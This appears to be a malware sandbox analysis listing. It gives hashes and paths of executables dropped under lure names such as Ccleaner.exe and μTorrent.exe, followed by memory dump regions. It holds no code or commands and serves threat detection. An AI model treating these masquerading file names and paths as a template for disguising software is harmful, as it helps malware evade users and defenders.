4b7df94d3622b82d852b0f532d7fd810ca2113d7b737ec417023d5b2142e9e79414a06d22647d73f8bc114f8e871a3a741a479b0aba48892f9078975ec78acba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

Filesize
507B

MD5
6832f1ed5b3043154d3b685cce8c8b87

SHA1
4c42ec0798aaad1fe7d7650e9e7c00bf978658b3

SHA256
fa9d245a676b1e7c3ebd887c5e0d1655ddcb7faf632197796dbb61eaf5131061

SHA512
cb847efcab6c67bbe0677984a6421befb559a32a33ea814d7acef539365f03cd14715e21e5d02b8d770abd73e74f8df108225aa1eb7dc8caca1723de15135584

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe

Filesize
1.1MB

MD5
d18ce77a75017e627de41febd9e289ee

SHA1
012a66d318e8294492accc0beca42c9999b68146

SHA256
7d6e025a8d510b10988375f020c60efec7d6ee77367ed8879e8a3b1172a5efd4

SHA512
c5f24a7f7c9e8ed552aa6402539171551851afd86b85b28e4018c2c8cd38c4ed22cb726eec5f750d90a25343e61e1cc97c62b1a486cbac6e04b777886411c86f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Project1.exe

Filesize
6.7MB

MD5
1166591fc5f77c463d176bcca574efff

SHA1
35d710b8983945aaf8c39d289fd6c73ed1f00b65

SHA256
a51c6e6c19be022dcbf235a9bebeab1b73292e2ee40b48653e80b96f10aa9bad

SHA512
751f5cf2cc5316ddbbba2805ac9c3fee24d80a85c92587c85ac80a2033aaeef96f58bcb5053584bcea7ad8fcb538183da9d29360f44666e1bfd3bdf0f08caa97

Download Submit
C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe

Filesize
1.1MB

MD5
17595fb50fdac8631d762e38e2474697

SHA1
3a8fd5d2335309feff92857f59b47257a1df927d

SHA256
7fee27bac2bf2d87bc277d4d7d435f9ab0b65b75f1c1848af17be7b2b963f880

SHA512
995ff44db169565f777514bfb88c585e2a734bf2351797f59bb48c5f773f62bcbaa1f45f6d2e4a139210aefa082577293fe5b10d94596f98b52c4eaef25534fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Torrent.exe

Filesize
6.9MB

MD5
cedb1319e9cbd45f4cc69e58699009d3

SHA1
ef66c3f343744a6afa9b9955d65e6ccaba41c27e

SHA256
5f61384bf58773755f2ae7500b1e24b1394df6b69c80d240ad0731842c908808

SHA512
bb204c60f138e4a341a6eafed2b39409105805e391bea572e5df0d8f0a24e5af8e2d2da9fedb26460adef321079efbe8443fa08bb0e0b3702e6478452bb26bd8

Download Submit
C:\Users\Admin\AppData\Local\Temp\cleaner.exe

Filesize
1.1MB

MD5
b4bae96dc11834b254ec53b2cdba13aa

SHA1
7b67438093eb1860237bf88aefebf56bb9333aba

SHA256
bcd5d4c36ee50d99d6ae1aa91c0c12569f711d37e7b59a3483f413c7c2b68142

SHA512
ea2b93b7f9046e931812ab8efd364502d936ad28fa174f1c63d79fa46bedc5bbbf3476c0b551e40ae75bf82cbb3c5a107e41b49aeb6cd0b5fc294a5813519eda

Download Submit
C:\Users\Admin\AppData\Local\Temp\cleaner.exe

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\μTorrent.exe

Filesize
6.9MB

MD5
7e962cb55be5963163d4f6a21100950c

SHA1
f58ad41f8c86b9cffc7d66f4991162f731926d1d

SHA256
1e6af101af20d01594ae2d42d066198b7e226546e6cd9f37594783618e758968

SHA512
757996c16752816850607d4ef1cb12e002133c73a2c431ef735aa56f01bf33a6ea4e2725556e2a53a4603552348477fa72c286afdf1fd605ea5f8671b2486b3a

Download Submit
C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe

Filesize
24.3MB

MD5
38d52d78beaf141a5c571ebac5abcecf

SHA1
459e3f5380f0bff65d8b3e968474286a4c22233e

SHA256
2d8c1346339bdc15a622224fda3e92f46e929c9a168d6369370fa1b52224a37f

SHA512
bbdcd23fdcda6c1d47f6fe6221c0bfe710686a3e9099c33e45298447805b00f3bd4022add5f90bddc8df53b44a6d67b5891b17b1b78974045675bc3b16ecf30b

Download Submit
C:\Users\Admin\secinit\sdchange.exe

Filesize
1.1MB

MD5
10e1cc65ee03662df9465daf93d2a6d4

SHA1
ddda80f58ef85711ada3e852f0ff678b11a19fba

SHA256
ff3159ab119e89371e98f968c9411d2867beffe2d19c81521048f24e08f03b73

SHA512
60514d3a9eba1a03153c831955c3998095c57e74126242eb394ebea45c47778d902f7acd584ee5bf38d345322a88db70726d3d6eae5d440d5850aa50a77d5fed

Download Submit
memory/776-111-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-85-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-73-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-72-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-71-0x0000000002CE0000-0x0000000002CE1000-memory.dmp

Filesize
4KB

Download
memory/776-70-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-69-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-68-0x0000000002CD0000-0x0000000002CD1000-memory.dmp

Filesize
4KB

Download
memory/776-67-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-66-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-65-0x0000000002CC0000-0x0000000002CC1000-memory.dmp

Filesize
4KB

Download
memory/776-64-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-63-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-93-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-94-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-114-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-120-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-119-0x0000000003810000-0x0000000003811000-memory.dmp

Filesize
4KB

Download
memory/776-118-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-57-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-56-0x0000000002A60000-0x0000000002A61000-memory.dmp

Filesize
4KB

Download
memory/776-58-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-75-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-59-0x0000000002CA0000-0x0000000002CA1000-memory.dmp

Filesize
4KB

Download
memory/776-60-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-61-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-117-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-116-0x0000000003800000-0x0000000003801000-memory.dmp

Filesize
4KB

Download
memory/776-115-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-113-0x00000000037F0000-0x00000000037F1000-memory.dmp

Filesize
4KB

Download
memory/776-112-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-62-0x0000000002CB0000-0x0000000002CB1000-memory.dmp

Filesize
4KB

Download
memory/776-76-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-110-0x00000000037E0000-0x00000000037E1000-memory.dmp

Filesize
4KB

Download
memory/776-109-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-108-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-107-0x00000000037D0000-0x00000000037D1000-memory.dmp

Filesize
4KB

Download
memory/776-106-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-105-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-104-0x00000000037C0000-0x00000000037C1000-memory.dmp

Filesize
4KB

Download
memory/776-103-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-102-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-101-0x00000000037B0000-0x00000000037B1000-memory.dmp

Filesize
4KB

Download
memory/776-100-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-99-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-98-0x00000000037A0000-0x00000000037A1000-memory.dmp

Filesize
4KB

Download
memory/776-97-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-96-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-95-0x0000000002D40000-0x0000000002D41000-memory.dmp

Filesize
4KB

Download
memory/776-92-0x0000000002D30000-0x0000000002D31000-memory.dmp

Filesize
4KB

Download
memory/776-91-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-89-0x0000000002D20000-0x0000000002D21000-memory.dmp

Filesize
4KB

Download
memory/776-87-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-88-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-86-0x0000000002D10000-0x0000000002D11000-memory.dmp

Filesize
4KB

Download
memory/776-74-0x0000000002CF0000-0x0000000002CF1000-memory.dmp

Filesize
4KB

Download
memory/776-84-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/776-83-0x0000000002D00000-0x0000000002D01000-memory.dmp

Filesize
4KB

Download
memory/776-90-0x00000000028F0000-0x0000000002A30000-memory.dmp

Filesize
1.2MB

Download
memory/1960-130-0x0000000002880000-0x00000000028A8000-memory.dmp

Filesize
160KB

Download
memory/1960-134-0x00000000059C0000-0x0000000005A26000-memory.dmp

Filesize
408KB

Download
memory/1960-128-0x0000000002850000-0x0000000002860000-memory.dmp

Filesize
64KB

Download
memory/1960-131-0x00000000052F0000-0x000000000538C000-memory.dmp

Filesize
624KB

Download
memory/1960-129-0x0000000004F70000-0x000000000501E000-memory.dmp

Filesize
696KB

Download
memory/1960-78-0x0000000000400000-0x0000000000456000-memory.dmp

Filesize
344KB

Download
memory/1960-139-0x00000000065C0000-0x00000000065D8000-memory.dmp

Filesize
96KB

Download
memory/1960-169-0x0000000006840000-0x0000000006856000-memory.dmp

Filesize
88KB

Download
memory/1960-132-0x0000000005A40000-0x0000000005FE4000-memory.dmp

Filesize
5.6MB

Download
memory/1960-214-0x0000000004F30000-0x0000000004F3C000-memory.dmp

Filesize
48KB

Download
memory/1960-170-0x0000000006990000-0x000000000699A000-memory.dmp

Filesize
40KB

Download
memory/1960-133-0x0000000005670000-0x0000000005702000-memory.dmp

Filesize
584KB

Download
memory/3132-173-0x000000001C190000-0x000000001C832000-memory.dmp

Filesize
6.6MB

Download
memory/3316-154-0x0000000003120000-0x0000000003128000-memory.dmp

Filesize
32KB

Download
memory/3316-45-0x0000000000970000-0x0000000001056000-memory.dmp

Filesize
6.9MB

Download
memory/4928-33-0x0000000000860000-0x0000000000F46000-memory.dmp

Filesize
6.9MB

Download